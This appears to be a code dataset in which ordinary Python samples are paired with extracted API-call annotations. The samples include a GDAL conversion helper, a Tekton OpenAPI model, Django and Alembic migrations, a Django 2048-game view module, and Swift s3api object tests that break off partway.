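        logging.info('converting {0} to geopackage {1}'.format(shppath
                                                               ,gpkgpath))
        # ogr2ogr -f GPKG writes the shapefile into a GeoPackage target
        callcmd = 'ogr2ogr -f GPKG {0} {1}'.format(gpkgpath
                                                  ,shppath)
        return subprocess.call(callcmd
                              ,shell=True)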
| [
"arcpy.EnableEditorTracking_management",
"arcpy.RegisterAsVersioned_management",
"arcpy.ChangePrivileges_management",
"pathlib.Path",
"arcpy.Describe",
"arcpy.TestSchemaLock",
"arcpy.FeatureClassToFeatureClass_conversion",
"arcpy.RebuildIndexes_management",
"arcpy.Exists",
"arcpy.Analyze_management",
"arcpy.Delete_management",
"arcpy.DisableArchiving_management",
"arcpy.EnableArchiving_management"
]
| [((513, 546), 'arcpy.Describe', 'arcpy.Describe', (['self.featureclass'], {}), '(self.featureclass)\n', (527, 546), False, 'import arcpy\n'), ((749, 780), 'arcpy.Exists', 'arcpy.Exists', (['self.featureclass'], {}), '(self.featureclass)\n', (761, 780), False, 'import arcpy\n'), ((877, 910), 'arcpy.Describe', 'arcpy.Describe', (['self.featureclass'], {}), '(self.featureclass)\n', (891, 910), False, 'import arcpy\n'), ((1140, 1182), 'arcpy.Delete_management', 'arcpy.Delete_management', (['self.featureclass'], {}), '(self.featureclass)\n', (1163, 1182), False, 'import arcpy\n'), ((1222, 1261), 'arcpy.TestSchemaLock', 'arcpy.TestSchemaLock', (['self.featureclass'], {}), '(self.featureclass)\n', (1242, 1261), False, 'import arcpy\n'), ((1982, 2057), 'arcpy.RegisterAsVersioned_management', 'arcpy.RegisterAsVersioned_management', (['self.featureclass', '"""NO_EDITS_TO_BASE"""'], {}), "(self.featureclass, 'NO_EDITS_TO_BASE')\n", (2018, 2057), False, 'import arcpy\n'), ((7326, 7359), 'arcpy.Describe', 'arcpy.Describe', (['self.featureclass'], {}), '(self.featureclass)\n', (7340, 7359), False, 'import arcpy\n'), ((7722, 7811), 'arcpy.FeatureClassToFeatureClass_conversion', 'arcpy.FeatureClassToFeatureClass_conversion', (['self.featureclass', 'outputdir', 'outputname'], {}), '(self.featureclass, outputdir,\n outputname)\n', (7765, 7811), False, 'import arcpy\n'), ((1021, 1083), 'arcpy.DisableArchiving_management', 'arcpy.DisableArchiving_management', (['self.featureclass', '"""DELETE"""'], {}), "(self.featureclass, 'DELETE')\n", (1054, 1083), False, 'import arcpy\n'), ((4345, 4505), 'arcpy.EnableEditorTracking_management', 'arcpy.EnableEditorTracking_management', (['self.featureclass', '"""CREATED_USER"""', '"""CREATED_DATE"""', '"""LAST_EDITED_USER"""', '"""LAST_EDITED_DATE"""', '"""NO_ADD_FIELDS"""', '"""UTC"""'], {}), "(self.featureclass, 'CREATED_USER',\n 'CREATED_DATE', 'LAST_EDITED_USER', 'LAST_EDITED_DATE', 'NO_ADD_FIELDS',\n 'UTC')\n", (4382, 4505), False, 'import arcpy\n'), ((5512, 5586), 'arcpy.ChangePrivileges_management', 'arcpy.ChangePrivileges_management', (['self.featureclass', 'user', '"""GRANT"""', 'edits'], {}), "(self.featureclass, user, 'GRANT', edits)\n", (5545, 5586), False, 'import arcpy\n'), ((6737, 6792), 'arcpy.Analyze_management', 'arcpy.Analyze_management', (['self.featureclass', 'components'], {}), '(self.featureclass, components)\n', (6761, 6792), False, 'import arcpy\n'), ((7013, 7098), 'arcpy.RebuildIndexes_management', 'arcpy.RebuildIndexes_management', (['self.gdb.sdeconn', '"""NO_SYSTEM"""', 'self.name', '"""ALL"""'], {}), "(self.gdb.sdeconn, 'NO_SYSTEM', self.name, 'ALL'\n )\n", (7044, 7098), False, 'import arcpy\n'), ((7441, 7492), 'arcpy.EnableArchiving_management', 'arcpy.EnableArchiving_management', (['self.featureclass'], {}), '(self.featureclass)\n', (7473, 7492), False, 'import arcpy\n'), ((2698, 2720), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (2710, 2720), False, 'import pathlib\n')] |
# Copyright 2020 The Tekton Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Tekton
Tekton Pipeline # noqa: E501
The version of the OpenAPI document: v0.17.2
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from tekton_pipeline.configuration import Configuration
class V1beta1EmbeddedTask(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'description': 'str',
'metadata': 'V1beta1PipelineTaskMetadata',
'params': 'list[V1beta1ParamSpec]',
'resources': 'V1beta1TaskResources',
'results': 'list[V1beta1TaskResult]',
'sidecars': 'list[V1beta1Sidecar]',
'step_template': 'V1Container',
'steps': 'list[V1beta1Step]',
'volumes': 'list[V1Volume]',
'workspaces': 'list[V1beta1WorkspaceDeclaration]'
}
attribute_map = {
'description': 'description',
'metadata': 'metadata',
'params': 'params',
'resources': 'resources',
'results': 'results',
'sidecars': 'sidecars',
'step_template': 'stepTemplate',
'steps': 'steps',
'volumes': 'volumes',
'workspaces': 'workspaces'
}
def __init__(self, description=None, metadata=None, params=None, resources=None, results=None, sidecars=None, step_template=None, steps=None, volumes=None, workspaces=None, local_vars_configuration=None): # noqa: E501
"""V1beta1EmbeddedTask - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._description = None
self._metadata = None
self._params = None
self._resources = None
self._results = None
self._sidecars = None
self._step_template = None
self._steps = None
self._volumes = None
self._workspaces = None
self.discriminator = None
if description is not None:
self.description = description
if metadata is not None:
self.metadata = metadata
if params is not None:
self.params = params
if resources is not None:
self.resources = resources
if results is not None:
self.results = results
if sidecars is not None:
self.sidecars = sidecars
if step_template is not None:
self.step_template = step_template
if steps is not None:
self.steps = steps
if volumes is not None:
self.volumes = volumes
if workspaces is not None:
self.workspaces = workspaces
@property
def description(self):
"""Gets the description of this V1beta1EmbeddedTask. # noqa: E501
Description is a user-facing description of the task that may be used to populate a UI. # noqa: E501
:return: The description of this V1beta1EmbeddedTask. # noqa: E501
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this V1beta1EmbeddedTask.
Description is a user-facing description of the task that may be used to populate a UI. # noqa: E501
:param description: The description of this V1beta1EmbeddedTask. # noqa: E501
:type: str
"""
self._description = description
@property
def metadata(self):
"""Gets the metadata of this V1beta1EmbeddedTask. # noqa: E501
:return: The metadata of this V1beta1EmbeddedTask. # noqa: E501
:rtype: V1beta1PipelineTaskMetadata
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1beta1EmbeddedTask.
:param metadata: The metadata of this V1beta1EmbeddedTask. # noqa: E501
:type: V1beta1PipelineTaskMetadata
"""
self._metadata = metadata
@property
def params(self):
"""Gets the params of this V1beta1EmbeddedTask. # noqa: E501
Params is a list of input parameters required to run the task. Params must be supplied as inputs in TaskRuns unless they declare a default value. # noqa: E501
:return: The params of this V1beta1EmbeddedTask. # noqa: E501
:rtype: list[V1beta1ParamSpec]
"""
return self._params
@params.setter
def params(self, params):
"""Sets the params of this V1beta1EmbeddedTask.
Params is a list of input parameters required to run the task. Params must be supplied as inputs in TaskRuns unless they declare a default value. # noqa: E501
:param params: The params of this V1beta1EmbeddedTask. # noqa: E501
:type: list[V1beta1ParamSpec]
"""
self._params = params
@property
def resources(self):
"""Gets the resources of this V1beta1EmbeddedTask. # noqa: E501
:return: The resources of this V1beta1EmbeddedTask. # noqa: E501
:rtype: V1beta1TaskResources
"""
return self._resources
@resources.setter
def resources(self, resources):
"""Sets the resources of this V1beta1EmbeddedTask.
:param resources: The resources of this V1beta1EmbeddedTask. # noqa: E501
:type: V1beta1TaskResources
"""
self._resources = resources
@property
def results(self):
"""Gets the results of this V1beta1EmbeddedTask. # noqa: E501
Results are values that this Task can output # noqa: E501
:return: The results of this V1beta1EmbeddedTask. # noqa: E501
:rtype: list[V1beta1TaskResult]
"""
return self._results
@results.setter
def results(self, results):
"""Sets the results of this V1beta1EmbeddedTask.
Results are values that this Task can output # noqa: E501
:param results: The results of this V1beta1EmbeddedTask. # noqa: E501
:type: list[V1beta1TaskResult]
"""
self._results = results
@property
def sidecars(self):
"""Gets the sidecars of this V1beta1EmbeddedTask. # noqa: E501
Sidecars are run alongside the Task's step containers. They begin before the steps start and end after the steps complete. # noqa: E501
:return: The sidecars of this V1beta1EmbeddedTask. # noqa: E501
:rtype: list[V1beta1Sidecar]
"""
return self._sidecars
@sidecars.setter
def sidecars(self, sidecars):
"""Sets the sidecars of this V1beta1EmbeddedTask.
Sidecars are run alongside the Task's step containers. They begin before the steps start and end after the steps complete. # noqa: E501
:param sidecars: The sidecars of this V1beta1EmbeddedTask. # noqa: E501
:type: list[V1beta1Sidecar]
"""
self._sidecars = sidecars
@property
def step_template(self):
"""Gets the step_template of this V1beta1EmbeddedTask. # noqa: E501
:return: The step_template of this V1beta1EmbeddedTask. # noqa: E501
:rtype: V1Container
"""
return self._step_template
@step_template.setter
def step_template(self, step_template):
"""Sets the step_template of this V1beta1EmbeddedTask.
:param step_template: The step_template of this V1beta1EmbeddedTask. # noqa: E501
:type: V1Container
"""
self._step_template = step_template
@property
def steps(self):
"""Gets the steps of this V1beta1EmbeddedTask. # noqa: E501
Steps are the steps of the build; each step is run sequentially with the source mounted into /workspace. # noqa: E501
:return: The steps of this V1beta1EmbeddedTask. # noqa: E501
:rtype: list[V1beta1Step]
"""
return self._steps
@steps.setter
def steps(self, steps):
"""Sets the steps of this V1beta1EmbeddedTask.
Steps are the steps of the build; each step is run sequentially with the source mounted into /workspace. # noqa: E501
:param steps: The steps of this V1beta1EmbeddedTask. # noqa: E501
:type: list[V1beta1Step]
"""
self._steps = steps
@property
def volumes(self):
"""Gets the volumes of this V1beta1EmbeddedTask. # noqa: E501
Volumes is a collection of volumes that are available to mount into the steps of the build. # noqa: E501
:return: The volumes of this V1beta1EmbeddedTask. # noqa: E501
:rtype: list[V1Volume]
"""
return self._volumes
@volumes.setter
def volumes(self, volumes):
"""Sets the volumes of this V1beta1EmbeddedTask.
Volumes is a collection of volumes that are available to mount into the steps of the build. # noqa: E501
:param volumes: The volumes of this V1beta1EmbeddedTask. # noqa: E501
:type: list[V1Volume]
"""
self._volumes = volumes
@property
def workspaces(self):
"""Gets the workspaces of this V1beta1EmbeddedTask. # noqa: E501
Workspaces are the volumes that this Task requires. # noqa: E501
:return: The workspaces of this V1beta1EmbeddedTask. # noqa: E501
:rtype: list[V1beta1WorkspaceDeclaration]
"""
return self._workspaces
@workspaces.setter
def workspaces(self, workspaces):
"""Sets the workspaces of this V1beta1EmbeddedTask.
Workspaces are the volumes that this Task requires. # noqa: E501
:param workspaces: The workspaces of this V1beta1EmbeddedTask. # noqa: E501
:type: list[V1beta1WorkspaceDeclaration]
"""
self._workspaces = workspaces
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1beta1EmbeddedTask):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1beta1EmbeddedTask):
return True
return self.to_dict() != other.to_dict()
| [
"tekton_pipeline.configuration.Configuration",
"six.iteritems"
]
| [((10862, 10895), 'six.iteritems', 'six.iteritems', (['self.openapi_types'], {}), '(self.openapi_types)\n', (10875, 10895), False, 'import six\n'), ((2520, 2535), 'tekton_pipeline.configuration.Configuration', 'Configuration', ([], {}), '()\n', (2533, 2535), False, 'from tekton_pipeline.configuration import Configuration\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-24 13:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('portal', '0006_auto_20170824_0950'),
]
operations = [
migrations.AddField(
model_name='sampledstackoverflowpost',
name='num_question_comments',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='question_score',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title',
field=models.CharField(default='', max_length=1182),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_coleman_liau_index',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_length',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_lexicon_count',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_percent_punctuation',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_percent_spaces',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_percent_uppercase',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_sentence_count',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='sampledstackoverflowpost',
name='title_starts_capitalized',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='sampledredditthread',
name='title',
field=models.CharField(default='', max_length=1182),
),
migrations.AlterField(
model_name='stackoverflowanswer',
name='owner_user_id',
field=models.IntegerField(blank=True, db_index=True, null=True),
),
migrations.AlterField(
model_name='stackoverflowanswer',
name='parent_id',
field=models.IntegerField(db_index=True),
),
migrations.AlterField(
model_name='stackoverflowquestion',
name='accepted_answer_id',
field=models.IntegerField(blank=True, db_index=True, null=True),
),
migrations.AlterField(
model_name='stackoverflowquestion',
name='owner_user_id',
field=models.IntegerField(db_index=True),
),
]
| [
"django.db.models.CharField",
"django.db.models.BooleanField",
"django.db.models.IntegerField"
]
| [((431, 461), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (450, 461), False, 'from django.db import migrations, models\n'), ((607, 637), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (626, 637), False, 'from django.db import migrations, models\n'), ((774, 819), 'django.db.models.CharField', 'models.CharField', ([], {'default': '""""""', 'max_length': '(1182)'}), "(default='', max_length=1182)\n", (790, 819), False, 'from django.db import migrations, models\n'), ((975, 1005), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (994, 1005), False, 'from django.db import migrations, models\n'), ((1149, 1179), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1168, 1179), False, 'from django.db import migrations, models\n'), ((1330, 1360), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1349, 1360), False, 'from django.db import migrations, models\n'), ((1517, 1547), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1536, 1547), False, 'from django.db import migrations, models\n'), ((1699, 1729), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1718, 1729), False, 'from django.db import migrations, models\n'), ((1884, 1914), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1903, 1914), False, 'from django.db import migrations, models\n'), ((2066, 2096), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (2085, 2096), False, 'from django.db import migrations, models\n'), ((2252, 2286), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (2271, 2286), False, 'from django.db import migrations, models\n'), ((2420, 2465), 'django.db.models.CharField', 'models.CharField', ([], {'default': '""""""', 'max_length': '(1182)'}), "(default='', max_length=1182)\n", (2436, 2465), False, 'from django.db import migrations, models\n'), ((2607, 2664), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'blank': '(True)', 'db_index': '(True)', 'null': '(True)'}), '(blank=True, db_index=True, null=True)\n', (2626, 2664), False, 'from django.db import migrations, models\n'), ((2802, 2836), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'db_index': '(True)'}), '(db_index=True)\n', (2821, 2836), False, 'from django.db import migrations, models\n'), ((2985, 3042), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'blank': '(True)', 'db_index': '(True)', 'null': '(True)'}), '(blank=True, db_index=True, null=True)\n', (3004, 3042), False, 'from django.db import migrations, models\n'), ((3186, 3220), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'db_index': '(True)'}), '(db_index=True)\n', (3205, 3220), False, 'from django.db import migrations, models\n')] |
from infoclientLib import InfoClient
ic = InfoClient('localhost', 15002, 'localhost', 15003)
ic.add('roi-weightedave', 'active')
ic.start()
| [
"infoclientLib.InfoClient"
]
| [((43, 93), 'infoclientLib.InfoClient', 'InfoClient', (['"""localhost"""', '(15002)', '"""localhost"""', '(15003)'], {}), "('localhost', 15002, 'localhost', 15003)\n", (53, 93), False, 'from infoclientLib import InfoClient\n')] |
import json
from django.contrib.auth.models import User
from django.http import JsonResponse
from django.shortcuts import redirect, render
from .models import Game2048
# Create your views here.
# test_user
# 8!S#5RP!WVMACg
def game(request):
return render(request, 'game_2048/index.html')
def set_result(request):
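    # Anonymous visitors are mapped to the shared 'test_user' account so that
    # their game state can still be saved without logging in.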
user = request.user if str(
request.user) != "AnonymousUser" else User.objects.get(username='test_user')
if request.method == 'POST':
# Get the game state from the POST request
game_state = request.body
obj = Game2048.objects.get(user=user)
        # Check if the game state is identical to the server-side game state
if game_state != obj.game_state:
            # parse the string into a JSON object
json_game_state = json.loads(game_state)
            # extract the value of 'best' from the JSON object
obj.best_score = json_game_state['best']
obj.game_state = json_game_state # save JSON object to game_state
obj.save()
else:
return redirect('game_2048:game')
return JsonResponse("", safe=False)
def get_result(request):
    # Check if the user is logged in; if not, fall back to the shared test_user
user = request.user if str(
request.user) != "AnonymousUser" else User.objects.get(username='test_user')
if request.method == 'GET':
obj, created = Game2048.objects.get_or_create(user=user)
game_state = obj.game_state
return JsonResponse(game_state, safe=False)
| [
"django.shortcuts.render",
"json.loads",
"django.http.JsonResponse",
"django.shortcuts.redirect",
"django.contrib.auth.models.User.objects.get"
]
| [((260, 299), 'django.shortcuts.render', 'render', (['request', '"""game_2048/index.html"""'], {}), "(request, 'game_2048/index.html')\n", (266, 299), False, 'from django.shortcuts import redirect, render\n'), ((1086, 1114), 'django.http.JsonResponse', 'JsonResponse', (['""""""'], {'safe': '(False)'}), "('', safe=False)\n", (1098, 1114), False, 'from django.http import JsonResponse\n'), ((1467, 1503), 'django.http.JsonResponse', 'JsonResponse', (['game_state'], {'safe': '(False)'}), '(game_state, safe=False)\n', (1479, 1503), False, 'from django.http import JsonResponse\n'), ((405, 443), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'username': '"""test_user"""'}), "(username='test_user')\n", (421, 443), False, 'from django.contrib.auth.models import User\n'), ((1047, 1073), 'django.shortcuts.redirect', 'redirect', (['"""game_2048:game"""'], {}), "('game_2048:game')\n", (1055, 1073), False, 'from django.shortcuts import redirect, render\n'), ((1282, 1320), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'username': '"""test_user"""'}), "(username='test_user')\n", (1298, 1320), False, 'from django.contrib.auth.models import User\n'), ((791, 813), 'json.loads', 'json.loads', (['game_state'], {}), '(game_state)\n', (801, 813), False, 'import json\n')] |
"""change admin to boolean
Revision ID: e86dd3bc539c
Revises: <KEY>
Create Date: 2020-11-11 22:32:00.707936
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'e86dd3bc539c'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('email_address', sa.Column('active', sa.Boolean(), nullable=False))
op.add_column('email_address', sa.Column('email_password', sa.String(length=255), nullable=False))
op.add_column('email_address', sa.Column('last_mailbox_size', sa.Integer(), nullable=True))
op.add_column('email_address', sa.Column('last_updated', sa.DateTime(), nullable=True))
op.add_column('email_address', sa.Column('phishing_mail_detected', sa.Integer(), nullable=True))
op.add_column('user', sa.Column('is_active', sa.Boolean(), nullable=False))
op.add_column('user', sa.Column('is_admin', sa.Boolean(), nullable=True))
op.add_column('user', sa.Column('last_logged_in', sa.DateTime(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('user', 'last_logged_in')
op.drop_column('user', 'is_admin')
op.drop_column('user', 'is_active')
op.drop_column('email_address', 'phishing_mail_detected')
op.drop_column('email_address', 'last_updated')
op.drop_column('email_address', 'last_mailbox_size')
op.drop_column('email_address', 'email_password')
op.drop_column('email_address', 'active')
# ### end Alembic commands ###
| [
"sqlalchemy.DateTime",
"sqlalchemy.Boolean",
"alembic.op.drop_column",
"sqlalchemy.Integer",
"sqlalchemy.String"
]
| [((1221, 1261), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""last_logged_in"""'], {}), "('user', 'last_logged_in')\n", (1235, 1261), False, 'from alembic import op\n'), ((1266, 1300), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""is_admin"""'], {}), "('user', 'is_admin')\n", (1280, 1300), False, 'from alembic import op\n'), ((1305, 1340), 'alembic.op.drop_column', 'op.drop_column', (['"""user"""', '"""is_active"""'], {}), "('user', 'is_active')\n", (1319, 1340), False, 'from alembic import op\n'), ((1345, 1402), 'alembic.op.drop_column', 'op.drop_column', (['"""email_address"""', '"""phishing_mail_detected"""'], {}), "('email_address', 'phishing_mail_detected')\n", (1359, 1402), False, 'from alembic import op\n'), ((1407, 1454), 'alembic.op.drop_column', 'op.drop_column', (['"""email_address"""', '"""last_updated"""'], {}), "('email_address', 'last_updated')\n", (1421, 1454), False, 'from alembic import op\n'), ((1459, 1511), 'alembic.op.drop_column', 'op.drop_column', (['"""email_address"""', '"""last_mailbox_size"""'], {}), "('email_address', 'last_mailbox_size')\n", (1473, 1511), False, 'from alembic import op\n'), ((1516, 1565), 'alembic.op.drop_column', 'op.drop_column', (['"""email_address"""', '"""email_password"""'], {}), "('email_address', 'email_password')\n", (1530, 1565), False, 'from alembic import op\n'), ((1570, 1611), 'alembic.op.drop_column', 'op.drop_column', (['"""email_address"""', '"""active"""'], {}), "('email_address', 'active')\n", (1584, 1611), False, 'from alembic import op\n'), ((431, 443), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (441, 443), True, 'import sqlalchemy as sa\n'), ((525, 546), 'sqlalchemy.String', 'sa.String', ([], {'length': '(255)'}), '(length=255)\n', (534, 546), True, 'import sqlalchemy as sa\n'), ((631, 643), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (641, 643), True, 'import sqlalchemy as sa\n'), ((722, 735), 'sqlalchemy.DateTime', 'sa.DateTime', ([], {}), '()\n', (733, 735), True, 'import sqlalchemy as sa\n'), ((824, 836), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (834, 836), True, 'import sqlalchemy as sa\n'), ((903, 915), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (913, 915), True, 'import sqlalchemy as sa\n'), ((982, 994), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (992, 994), True, 'import sqlalchemy as sa\n'), ((1066, 1079), 'sqlalchemy.DateTime', 'sa.DateTime', ([], {}), '()\n', (1077, 1079), True, 'import sqlalchemy as sa\n')] |
# Copyright (c) 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from datetime import datetime
import hashlib
import os
from os.path import join
import time
from mock import patch
from swift.common import swob
from swift.common.swob import Request
from test.unit.common.middleware.s3api import S3ApiTestCase
from test.unit.common.middleware.s3api.test_s3_acl import s3acl
from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, \
Owner, Grant
from swift.common.middleware.s3api.etree import fromstring
from swift.common.middleware.s3api.utils import mktime, S3Timestamp
from test.unit.common.middleware.s3api.helpers import FakeSwift
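# Wraps FakeSwift's fake auth middleware so that an AWS-style Authorization
# header ('AWS tenant:user:signature') also produces keystone-style
# X-Tenant-Name / X-User-Name headers for the s3acl-with-keystone tests.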
def _wrap_fake_auth_middleware(org_func):
def fake_fake_auth_middleware(self, env):
org_func(env)
if 'swift.authorize_override' in env:
return
if 'HTTP_AUTHORIZATION' not in env:
return
_, authorization = env['HTTP_AUTHORIZATION'].split(' ')
tenant_user, sign = authorization.rsplit(':', 1)
tenant, user = tenant_user.rsplit(':', 1)
env['HTTP_X_TENANT_NAME'] = tenant
env['HTTP_X_USER_NAME'] = user
return fake_fake_auth_middleware
class TestS3ApiObj(S3ApiTestCase):
def setUp(self):
super(TestS3ApiObj, self).setUp()
self.object_body = 'hello'
self.etag = hashlib.md5(self.object_body).hexdigest()
self.last_modified = 'Fri, 01 Apr 2014 12:00:00 GMT'
self.response_headers = {'Content-Type': 'text/html',
'Content-Length': len(self.object_body),
'Content-Disposition': 'inline',
'Content-Language': 'en',
'x-object-meta-test': 'swift',
'etag': self.etag,
'last-modified': self.last_modified,
'expires': 'Mon, 21 Sep 2015 12:00:00 GMT',
'x-robots-tag': 'nofollow',
'cache-control': 'private'}
self.swift.register('GET', '/v1/AUTH_test/bucket/object',
swob.HTTPOk, self.response_headers,
self.object_body)
self.swift.register('PUT', '/v1/AUTH_test/bucket/object',
swob.HTTPCreated,
{'etag': self.etag,
'last-modified': self.last_modified,
'x-object-meta-something': 'oh hai'},
None)
def _test_object_GETorHEAD(self, method):
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': method},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '200')
unexpected_headers = []
for key, val in self.response_headers.iteritems():
if key in ('Content-Length', 'Content-Type', 'content-encoding',
'last-modified', 'cache-control', 'Content-Disposition',
'Content-Language', 'expires', 'x-robots-tag'):
self.assertIn(key, headers)
self.assertEqual(headers[key], str(val))
elif key == 'etag':
self.assertEqual(headers[key], '"%s"' % val)
elif key.startswith('x-object-meta-'):
self.assertIn('x-amz-meta-' + key[14:], headers)
self.assertEqual(headers['x-amz-meta-' + key[14:]], val)
else:
unexpected_headers.append((key, val))
if unexpected_headers:
self.fail('unexpected headers: %r' % unexpected_headers)
self.assertEqual(headers['etag'],
'"%s"' % self.response_headers['etag'])
if method == 'GET':
self.assertEqual(body, self.object_body)
@s3acl
def test_object_HEAD_error(self):
        # Per the REST API specification, HEAD does not return a body even
        # for an error response, so these HEAD error tests only check the
        # response code.
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPUnauthorized, {}, None)
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '403')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPForbidden, {}, None)
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '403')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPNotFound, {}, None)
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '404')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPPreconditionFailed, {}, None)
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '412')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
self.swift.register('HEAD', '/v1/AUTH_test/bucket/object',
swob.HTTPServerError, {}, None)
status, headers, body = self.call_s3api(req)
self.assertEqual(status.split()[0], '500')
self.assertEqual(body, '') # sanity
req = Request.blank('/bucket/object',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'Authorization': 'AWS test:tester:hmac',
'Date': self.get_date_header()})
